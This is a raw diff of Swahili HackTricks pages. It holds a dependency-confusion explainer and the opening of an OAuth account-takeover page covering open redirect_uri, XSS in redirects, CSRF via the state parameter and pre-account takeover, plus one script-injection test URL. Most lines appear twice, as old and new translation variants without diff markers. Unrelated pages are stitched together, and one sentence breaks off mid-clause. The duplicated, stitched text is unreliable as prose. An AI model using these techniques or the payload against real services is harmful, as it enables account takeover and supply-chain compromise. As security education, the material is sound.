* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi
|
||||
|
||||
Kwa muhtasari, udhaifu wa kuchanganyikiwa kwa utegemezi hutokea wakati mradi unatumia maktaba yenye jina **lililokosewa**, **isiyokuwepo**, au na **toleo lisiloelezwa**, na hifadhi ya utegemezi inayotumiwa inaruhusu **kukusanya toleo jipya kutoka kwenye hifadhi za umma**.
|
||||
Kwa muhtasari, udhaifu wa kutokuwepo kwa utegemezi hutokea wakati mradi unatumia maktaba yenye jina **lililochorwa vibaya**, **lisilopo** au lenye **toleo lisiloelezwa** na hifadhi ya utegemezi inaruhusu **kukusanya toleo jipya kutoka kwenye hifadhi za umma**.
|
||||
|
||||
* **Jina lililokosewa**: Ingiza **`reqests`** badala ya `requests`
|
||||
* **Isiyokuwepo**: Ingiza `company-logging`, maktaba ya ndani ambayo **haipo tena**
|
||||
* **Toleo lisiloelezwa**: Ingiza maktaba ya **ndani** **iliyopo** `company-requests`, lakini hifadhi inachunguza **hifadhi za umma** ili kuona kama kuna **toleo kubwa**.
|
||||
* **Lililochorwa vibaya**: Ingiza **`reqests`** badala ya `requests`
|
||||
* **Lisilopo**: Ingiza `company-logging`, maktaba ya ndani ambayo **haipo tena**
|
||||
* **Toleo lisiloelezwa**: Ingiza maktaba ya **ndani** **iliyopo** `company-requests`, lakini hifadhi inachunguza **hifadhi za umma** kuona kama kuna **toleo kubwa**.
|
||||
|
||||
## Udukuzi
|
||||
|
||||
{% hint style="warning" %}
|
||||
Katika kila kesi, mshambuliaji anahitaji tu kuchapisha **pakiti yenye nia mbaya na jina** la maktaba zinazotumiwa na kampuni ya mwathirika.
|
||||
Katika kila kesi, muhusika anahitaji tu kuchapisha **pakiti yenye nia mbaya yenye jina** la maktaba zilizotumiwa na kampuni ya mwathiriwa.
|
||||
{% endhint %}
|
||||
|
||||
### Jina Lililokosewa & Isiyokuwepo
|
||||
### Lililochorwa Vibaya & Lisilopo
|
||||
|
||||
Ikiwa kampuni yako inajaribu **kuagiza maktaba ambayo sio ya ndani**, kuna uwezekano mkubwa hifadhi ya maktaba itatafuta hiyo katika **hifadhi za umma**. Ikiwa mshambuliaji ameitunga, namna kodi yako na mashine zinazoendesha zinaweza kuwa hatarini sana.
|
||||
Ikiwa kampuni yako inajaribu **kuagiza maktaba ambayo sio ya ndani**, kuna uwezekano mkubwa hifadhi ya maktaba itakuwa inatafuta katika **hifadhi za umma**. Ikiwa muhusika ameitengeneza, programu yako na mashine zinazoendesha zinaweza kuwa zimeathiriwa sana.
|
||||
|
||||
### Toleo Lisiloelezwa
|
||||
|
||||
Ni kawaida sana kwa watengenezaji kutotaja **toleo lolote** la maktaba inayotumiwa, au kutaja tu **toleo kuu**. Kisha, mkalimani atajaribu kupakua **toleo jipya zaidi** linalolingana na mahitaji hayo.\
|
||||
Ikiwa maktaba ni **maktaba ya nje inayojulikana** (kama vile `requests` ya python), **mshambuliaji hawezi kufanya mengi**, kwani hataweza kuunda maktaba inayoitwa `requests` (isipokuwa yeye ndiye mwandishi halisi).\
|
||||
Walakini, ikiwa maktaba ni **ya ndani**, kama vile `requests-company` katika mfano huu, ikiwa **hifadhi ya maktaba** inaruhusu **kuangalia toleo jipya pia kwa njia ya nje**, itatafuta toleo jipya linalopatikana hadharani.\
|
||||
Kwa hivyo ikiwa **mshambuliaji anajua** kuwa kampuni inatumia maktaba ya `requests-company` **toleo 1.0.1** (inaruhusu sasisho ndogo). Anaweza **kuchapisha** maktaba ya `requests-company` **toleo 1.0.2** na kampuni ita**tumia maktaba hiyo badala** ya ile ya ndani.
|
||||
Ni kawaida kwa wabunifu **kutotaja toleo lolote** la maktaba inayotumiwa, au kutaja tu **toleo kuu**. Kisha, mkalimani atajaribu kupakua **toleo jipya zaidi** linalofaa mahitaji hayo.\
|
||||
Ikiwa maktaba ni **maktaba ya nje inayojulikana** (kama vile python `requests`), **muhusika hawezi kufanya mengi**, kwani hataweza kuunda maktaba iliyoitwa `requests` (isipokuwa yeye ni mwandishi halisi).\
|
||||
Hata hivyo, ikiwa maktaba ni **ndani**, kama `requests-company` katika mfano huu, ikiwa **hifadhi ya maktaba** inaruhusu **kuangalia toleo jipya pia kwa nje**, itatafuta toleo jipya lililopo hadharani.\
|
||||
Kwa hivyo ikiwa **muhusika anajua** kuwa kampuni inatumia maktaba ya `requests-company` **toleo 1.0.1** (kuruhusu visasisho vidogo). Anaweza **kuchapisha** maktaba ya `requests-company` **toleo 1.0.2** na kampuni itaanza **kutumia maktaba hiyo badala** ya ile ya ndani.
|
||||
|
||||
## AWS Mwisho
|
||||
## AWS Kurekebisha
|
||||
|
||||
Udhaifu huu uligunduliwa katika AWS **CodeArtifact** (soma [**mambo ya kina katika chapisho hili la blogu**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)).\
|
||||
AWS ilirekebisha hili kwa kuruhusu kutaja ikiwa maktaba ni ya ndani au ya nje, ili kuepuka kupakua utegemezi wa ndani kutoka kwenye hifadhi za nje.
|
||||
Udhaifu huu uligunduliwa katika AWS **CodeArtifact** (soma [**maelezo katika chapisho hili la blogi**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)).\
|
||||
AWS ilirekebisha hii kwa kuruhusu kutaja ikiwa maktaba ni ya ndani au ya nje, ili kuepuka kupakua utegemezi wa ndani kutoka kwenye hifadhi za nje.
|
||||
|
||||
## Kupata Maktaba Zenye Udhaifu
|
||||
## Kutambua Maktaba Zenye Udhaifu
|
||||
|
||||
Katika [**chapisho asili kuhusu kuchanganyikiwa kwa utegemezi**](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) mwandishi alitafuta maelfu ya faili za package.json zilizo wazi zinazoonyesha utegemezi wa miradi ya javascript.
|
||||
Katika [**chapisho la awali kuhusu kutokuwepo kwa utegemezi**](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) mwandishi alitafuta maelfu ya faili za package.json zilizo wazi zinazoambatanisha utegemezi wa miradi ya javascript.
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|
||||
* [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) and [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,48 +1,53 @@
|
|||
# OAuth hadi Kuchukua Udhibiti wa Akaunti
|
||||
# OAuth hadi Uchukuzi wa Akaunti
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi <a href="#d4a8" id="d4a8"></a>
|
||||
|
||||
OAuth inatoa toleo mbalimbali, na ufahamu wa msingi unapatikana kwenye [hati ya OAuth 2.0](https://oauth.net/2/). Majadiliano haya yanazingatia sana [aina ya idhini ya nambari ya utoaji wa OAuth 2.0](https://oauth.net/2/grant-types/authorization-code/), ambayo hutoa **mfumo wa idhini unaoruhusu programu kupata au kutekeleza hatua kwenye akaunti ya mtumiaji kwenye programu nyingine** (seva ya idhini).
|
||||
OAuth inatoa toleo mbalimbali, na ufahamu wa msingi unapatikana kwenye [hati ya OAuth 2.0](https://oauth.net/2/). Mjadala huu unazingatia kwa kiasi kikubwa [aina ya idhini ya nambari ya uthibitishaji ya OAuth 2.0](https://oauth.net/2/grant-types/authorization-code/), ikitoa **mtaala wa idhini unaowezesha programu kupata au kutekeleza vitendo kwenye akaunti ya mtumiaji kwenye programu nyingine** (seva ya idhini).
|
||||
|
||||
Fikiria tovuti ya kufikirika _**https://example.com**_, iliyoundwa kuonyesha **machapisho yako ya media ya kijamii**, pamoja na yale ya faragha. Ili kufanikisha hili, OAuth 2.0 hutumiwa. _https://example.com_ itaomba idhini yako ya **kupata machapisho yako ya media ya kijamii**. Kwa hiyo, skrini ya idhini itaonekana kwenye _https://socialmedia.com_, ikielezea **idhini inayotakiwa na msanidi programu anayefanya ombi**. Baada ya idhini yako, _https://example.com_ inapata uwezo wa **kupata machapisho yako kwa niaba yako**.
|
||||
Fikiria tovuti ya dhana _**https://mfano.com**_, iliyoundwa kuonyesha **machapisho yako ya mitandao ya kijamii**, pamoja na yale ya faragha. Ili kufanikisha hili, OAuth 2.0 inatumika. _https://mfano.com_ itaomba idhini yako ku **kupata machapisho yako ya mitandao ya kijamii**. Kwa hivyo, skrini ya idhini itaonekana kwenye _https://mitandaojamii.com_, ikielezea **idhini inayotakiwa na mwandishi wa ombi**. Baada ya idhini yako, _https://mfano.com_ inapata uwezo wa **kupata machapisho yako kwa niaba yako**.
|
||||
|
||||
Ni muhimu kuelewa sehemu zifuatazo ndani ya mfumo wa OAuth 2.0:
|
||||
Ni muhimu kuelewa vipengele vifuatavyo ndani ya mfumo wa OAuth 2.0:
|
||||
|
||||
- **mmiliki wa rasilimali**: Wewe, kama **mtumiaji/kifaa**, unaidhinisha upatikanaji wa rasilimali yako, kama vile machapisho ya akaunti yako ya media ya kijamii.
|
||||
- **seva ya rasilimali**: **Seva inayosimamia maombi yaliyothibitishwa** baada ya programu kupata `access token` kwa niaba ya `mmiliki wa rasilimali`, kwa mfano, **https://socialmedia.com**.
|
||||
- **programu ya mteja**: **Programu inayotafuta idhini** kutoka kwa `mmiliki wa rasilimali`, kama vile **https://example.com**.
|
||||
- **seva ya idhini**: **Seva inayotoa `access token`** kwa `programu ya mteja` baada ya kuthibitisha kwa mafanikio `mmiliki wa rasilimali` na kupata idhini, kwa mfano, **https://socialmedia.com**.
|
||||
- **client\_id**: Kitambulisho cha umma na cha kipekee kwa programu.
|
||||
- **client\_secret:** Neno la siri la siri, linalojulikana tu kwa programu na seva ya idhini, linalotumiwa kuzalisha `access_token`.
|
||||
- **response\_type**: Thamani inayoelezea **aina ya token inayohitajika**, kama vile `code`.
|
||||
- **mmiliki wa rasilimali**: Wewe, kama **mtumiaji/kitu**, unaidhinisha upatikanaji wa rasilimali yako, kama machapisho ya akaunti yako ya mitandao ya kijamii.
|
||||
- **seva ya rasilimali**: **Seva inayosimamia maombi yaliyothibitishwa** baada ya programu kupata `access token` kwa niaba ya `mmiliki wa rasilimali`, k.m., **https://mitandaojamii.com**.
|
||||
- **programu ya mteja**: **Programu inayotafuta idhini** kutoka kwa `mmiliki wa rasilimali`, kama vile **https://mfano.com**.
|
||||
- **seva ya idhini**: **Seva inayotoa `access token`** kwa `programu ya mteja` baada ya uthibitishaji mafanikio wa `mmiliki wa rasilimali` na kupata idhini, k.m., **https://mitandaojamii.com**.
|
||||
- **client\_id**: Kitambulisho cha umma, cha kipekee kwa programu.
|
||||
- **client\_secret:** Neno la siri, linalojulikana tu kwa programu na seva ya idhini, hutumiwa kuzalisha `access_tokens`.
|
||||
- **response\_type**: Thamani inayoeleza **aina ya token inayotakiwa**, kama `code`.
|
||||
- **scope**: **Kiwango cha upatikanaji** ambacho `programu ya mteja` inaomba kutoka kwa `mmiliki wa rasilimali`.
|
||||
- **redirect\_uri**: **URL ambayo mtumiaji anaelekezwa baada ya idhini**. Kawaida hii lazima ifanane na URL ya kuongoza iliyosajiliwa mapema.
|
||||
- **state**: Parameta ya **kudumisha data wakati mtumiaji anaelekezwa na kurudi kutoka kwa seva ya idhini**. Unyenyekevu wake ni muhimu kama **muhimili wa ulinzi wa CSRF**.
|
||||
- **redirect\_uri**: **URL ambayo mtumiaji anaelekezwa baada ya idhini**. Kawaida hii lazima ifanane na URL ya kuhamisha iliyosajiliwa mapema.
|
||||
- **state**: Parameta ya **kuhifadhi data wakati wa kuhamisha mtumiaji kwenye na kutoka kwa seva ya idhini**. Upekee wake ni muhimu kama **muhimili wa ulinzi wa CSRF**.
|
||||
- **grant\_type**: Parameta inayoonyesha **aina ya idhini na aina ya token itakayorudishwa**.
|
||||
- **code**: Nambari ya idhini kutoka kwa `seva ya idhini`, inayotumiwa pamoja na `client_id` na `client_secret` na programu ya mteja kupata `access_token`.
|
||||
- **access\_token**: **Token ambayo programu ya mteja hutumia kwa maombi ya API** kwa niaba ya `mmiliki wa rasilimali`.
|
||||
- **refresh\_token**: Inawezesha programu kupata **access_token mpya bila kumwomba tena mtumiaji**.
|
||||
- **access\_token**: **Token ambao programu ya mteja hutumia kwa maombi ya API** kwa niaba ya `mmiliki wa rasilimali`.
|
||||
- **refresh\_token**: Inawezesha programu kupata **access_token mpya bila kumwuliza tena mtumiaji**.
|
||||
|
||||
### Mchakato
|
||||
### Mzunguko
|
||||
|
||||
**Mchakato halisi wa OAuth** unafuata hatua zifuatazo:
|
||||
**Mzunguko halisi wa OAuth** unafuata hatua zifuatazo:
|
||||
|
||||
1. Nenda kwenye [https://example.com](https://example.com) na chagua kifungo "Integrate with Social Media".
|
||||
2. Tovuti hiyo kisha itatuma ombi kwa [https://socialmedia.com](https://socialmedia.com) kuomba idhini yako kuruhusu programu ya https://example.com kupata machapisho yako. Ombi linajengwa kama ifuatavyo:
|
||||
1. Nenda kwenye [https://mfano.com](https://mfano.com) na chagua kitufe cha "Integrate with Social Media".
|
||||
2. Tovuti hiyo kisha itatuma ombi kwa [https://mitandaojamii.com](https://mitandaojamii.com) kuomba idhini yako kuruhusu programu ya https://mfano.com kupata machapisho yako. Ombi hilo limeundwa kama:
|
||||
```
|
||||
https://socialmedia.com/auth
|
||||
?response_type=code
|
||||
|
@ -51,64 +56,64 @@ https://socialmedia.com/auth
|
|||
&scope=readPosts
|
||||
&state=randomString123
|
||||
```
|
||||
3. Kisha utapewa ukurasa wa idhini.
|
||||
3. Kisha utaletewa ukurasa wa idhini.
|
||||
|
||||
4. Baada ya idhini yako, Mtandao wa Kijamii utatuma jibu kwa `redirect_uri` na vigezo vya `code` na `state`:
|
||||
4. Baada ya idhini yako, Mitandao ya Kijamii inatuma jibu kwa `redirect_uri` na vigezo vya `code` na `state`:
|
||||
```
|
||||
https://example.com?code=uniqueCode123&state=randomString123
|
||||
```
|
||||
5. https://example.com hutumia `code` hii, pamoja na `client_id` na `client_secret` yake, kufanya ombi la upande wa seva ili kupata `access_token` kwa niaba yako, kuruhusu ufikiaji wa ruhusa ulizokubali:
|
||||
5. https://example.com inatumia hii `code`, pamoja na `client_id` na `client_secret` yake, kufanya ombi upande wa server kupata `access_token` kwa niaba yako, kuruhusu ufikiaji wa ruhusa ulizoidhinisha:
|
||||
```
|
||||
POST /oauth/access_token
|
||||
Host: socialmedia.com
|
||||
...{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
|
||||
```
|
||||
6. Hatimaye, mchakato unakamilika kwa https://example.com kutumia `access_token` yako kufanya wito wa API kwa Mitandao ya Kijamii ili kupata ufikiaji.
|
||||
6. Hatimaye, mchakato unamalizika kama https://example.com inatumia `access_token` yako kufanya wito wa API kwa Mitandao ya Kijamii ili kupata
|
||||
|
||||
## Mianya <a href="#323a" id="323a"></a>
|
||||
## Mapungufu <a href="#323a" id="323a"></a>
|
||||
|
||||
### Open redirect\_uri <a href="#cc36" id="cc36"></a>
|
||||
### Uelekezaji wazi\_uri <a href="#cc36" id="cc36"></a>
|
||||
|
||||
`redirect_uri` ni muhimu kwa usalama katika utekelezaji wa OAuth na OpenID, kwani inaelekeza wapi data nyeti, kama nambari za idhini, zinatumwa baada ya idhini. Ikiwa imepangwa vibaya, inaweza kuruhusu wadukuzi kupelekeza maombi haya kwa seva mbaya, kuruhusu kuchukua udhibiti wa akaunti.
|
||||
`redirect_uri` ni muhimu kwa usalama katika utekelezaji wa OAuth na OpenID, kwani inaelekeza wapi data nyeti, kama nambari za idhini, zinatumwa baada ya idhini. Ikiwa imepangiliwa vibaya, inaweza kuruhusu wachawi kuuelekeza maombi haya kwa seva zenye nia mbaya, kuruhusu utekaji wa akaunti.
|
||||
|
||||
Teknolojia za kudukua hutofautiana kulingana na mantiki ya ukaguzi wa seva ya idhini. Zinaweza kutofautiana kutoka kwa kulinganisha njia kwa kukubali URL yoyote ndani ya kikoa au kwenye saraka iliyotajwa. Njia za kawaida za kudukua ni pamoja na kupelekeza wazi, kuvuka njia, kudukua regex dhaifu, na kuingiza HTML kwa wizi wa alama.
|
||||
Mbinu za kutumia zinatofautiana kulingana na mantiki ya uthibitishaji wa seva ya idhini. Wanaweza kutofautiana kutoka kwa kulinganisha njia kwa umakini hadi kukubali URL yoyote ndani ya kikoa au folda iliyotajwa. Mbinu za kawaida za kutumia ni pamoja na uelekezaji wazi, upitishaji wa njia, kutumia regex dhaifu, na kuingiza HTML kwa wizi wa alama.
|
||||
|
||||
Mbali na `redirect_uri`, vigezo vingine vya OAuth na OpenID kama `client_uri`, `policy_uri`, `tos_uri`, na `initiate_login_uri` pia ni rahisi kudukuliwa kwa mashambulizi ya kupelekeza. Vigezo hivi ni hiari na msaada wao hutofautiana kati ya seva.
|
||||
Mbali na `redirect_uri`, vigezo vingine vya OAuth na OpenID kama `client_uri`, `policy_uri`, `tos_uri`, na `initiate_login_uri` pia wanaweza kuwa katika hatari ya mashambulizi ya uelekezaji. Vigezo hivi sio lazima na msaada wao hutofautiana kati ya seva.
|
||||
|
||||
Kwa wale wanaolenga seva ya OpenID, kipengele cha ugunduzi (`**.well-known/openid-configuration**`) mara nyingi hutoa maelezo muhimu ya usanidi kama vile `registration_endpoint`, `request_uri_parameter_supported`, na "`require_request_uri_registration`. Maelezo haya yanaweza kusaidia katika kutambua kipengele cha usajili na maelezo mengine ya usanidi wa seva.
|
||||
Kwa wale wanaolenga seva ya OpenID, kipengele cha ugunduzi (`**.well-known/openid-configuration**`) mara nyingi hupata maelezo muhimu ya usanidi kama vile `registration_endpoint`, `request_uri_parameter_supported`, na "`require_request_uri_registration`. Maelezo haya yanaweza kusaidia katika kutambua mwisho wa usajili na maelezo mengine ya usanidi wa seva.
|
||||
|
||||
### XSS katika utekelezaji wa kupelekeza <a href="#bda5" id="bda5"></a>
|
||||
### XSS katika utekelezaji wa uelekezaji <a href="#bda5" id="bda5"></a>
|
||||
|
||||
Kama ilivyotajwa katika ripoti hii ya zawadi ya mdudu [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) inaweza kuwa inawezekana kuwa **URL ya kupelekeza inaonyeshwa katika jibu** la seva baada ya mtumiaji kuthibitisha, ikiwa **inavuja kwa XSS**. Payload inayowezekana kujaribu:
|
||||
Kama ilivyotajwa katika ripoti hii ya tuzo ya mdudu [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) inaweza kuwa inawezekana kwamba **URL ya uelekezaji inaonyeshwa katika majibu** ya seva baada ya mtumiaji kujithibitisha, ikiwa **inavuliwa kwa XSS**. Payload inayowezekana kwa majaribio:
|
||||
```
|
||||
https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
|
||||
```
|
||||
### CSRF - Kukosa kushughulikia kwa usahihi kipengele cha hali <a href="#bda5" id="bda5"></a>
|
||||
### CSRF - Kukosea kushughulikia parameter ya hali <a href="#bda5" id="bda5"></a>
|
||||
|
||||
Katika utekelezaji wa OAuth, matumizi mabaya au kutotumia kipengele cha **`hali`** kinaweza kuongeza hatari kubwa ya mashambulizi ya **Cross-Site Request Forgery (CSRF)**. Udhaifu huu unatokea wakati kipengele cha `hali` kinapotumiwa **kwa njia isiyofaa, kutumiwa kama thamani ya tuli, au kutokushughulikiwa kwa usahihi**, kuruhusu wadukuzi kukiuka ulinzi wa CSRF.
|
||||
Katika utekelezaji wa OAuth, matumizi mabaya au kutokuwepo kwa **parameter ya `state`** inaweza kuongeza hatari kubwa ya mashambulizi ya **Cross-Site Request Forgery (CSRF)**. Udhaifu huu unatokea wakati parameter ya `state` inatumika **kwa njia isiyo sahihi, kutumika kama thamani ya msingi, au kutokuwa na uthibitisho sahihi**, kuruhusu wachomaji kukiuka ulinzi wa CSRF.
|
||||
|
||||
Wadukuzi wanaweza kutumia hili kwa kuvuruga mchakato wa idhini ili kuunganisha akaunti yao na akaunti ya muathirika, hivyo kusababisha **uchukuzi wa akaunti**. Hii ni hatari hasa katika programu ambapo OAuth hutumiwa kwa **madhumuni ya uwakilishi**.
|
||||
Wachomaji wanaweza kutumia hili kwa kuingilia mchakato wa idhini ili kuunganisha akaunti yao na akaunti ya muathiriwa, ikisababisha **uchukuzi wa akaunti**. Hii ni muhimu sana katika programu ambapo OAuth inatumika kwa **madhumuni ya uthibitisho**.
|
||||
|
||||
Mifano halisi ya udhaifu huu imeandikwa katika changamoto mbalimbali za **CTF** na **jukwaa za udukuzi**, ikionyesha athari zake za vitendo. Tatizo hili pia linahusisha ujumuishaji na huduma za tatu kama vile **Slack**, **Stripe**, na **PayPal**, ambapo wadukuzi wanaweza kuhamisha arifa au malipo kwenye akaunti zao.
|
||||
Mifano halisi ya udhaifu huu imerekodiwa katika changamoto mbalimbali za **CTF** na **majukwaa ya udukuzi**, ikionyesha athari zake za vitendo. Tatizo hili pia linahusiana na uingizaji wa huduma za tatu kama **Slack**, **Stripe**, na **PayPal**, ambapo wachomaji wanaweza kuelekeza arifa au malipo kwa akaunti zao.
|
||||
|
||||
Kushughulikia na kuthibitisha kwa usahihi kipengele cha **`hali`** ni muhimu kwa kulinda dhidi ya CSRF na kusimamia mchakato wa OAuth.
|
||||
Kushughulikia na kuthibitisha parameter ya **`state`** kwa usahihi ni muhimu kwa kulinda dhidi ya CSRF na kusimamia mchakato wa OAuth.
|
||||
|
||||
### Kabla ya Uchukuzi wa Akaunti <a href="#ebe4" id="ebe4"></a>
|
||||
|
||||
1. **Bila Uthibitisho wa Barua pepe Wakati wa Kuunda Akaunti**: Wadukuzi wanaweza kuunda akaunti mapema kwa kutumia barua pepe ya muathirika. Ikiwa muathirika baadaye anatumia huduma ya tatu kwa kuingia, programu inaweza kwa bahati mbaya kuunganisha akaunti hii ya tatu na akaunti iliyoundwa mapema na muhalifu, hivyo kusababisha ufikiaji usiohalali.
|
||||
1. **Bila Uthibitishaji wa Barua pepe Wakati wa Uundaji wa Akaunti**: Wachomaji wanaweza kuunda akaunti mapema kwa kutumia barua pepe ya muathiriwa. Ikiwa muathiriwa baadaye anatumia huduma ya tatu kwa kuingia, programu inaweza kwa bahati mbaya kuunganisha akaunti hii ya tatu ya muathiriwa na akaunti iliyoundwa mapema ya mchomaji, ikisababisha ufikiaji usioidhinishwa.
|
||||
|
||||
2. **Kudukua Uthibitisho Mdogo wa Barua pepe wa OAuth**: Wadukuzi wanaweza kutumia huduma za OAuth ambazo hazithibitishi barua pepe kwa kujisajili na huduma hiyo na kisha kubadilisha barua pepe ya akaunti kuwa ya muathirika. Njia hii ina hatari sawa ya ufikiaji usiohalali wa akaunti, kama ilivyo kwa kisa cha kwanza lakini kupitia njia tofauti ya shambulio.
|
||||
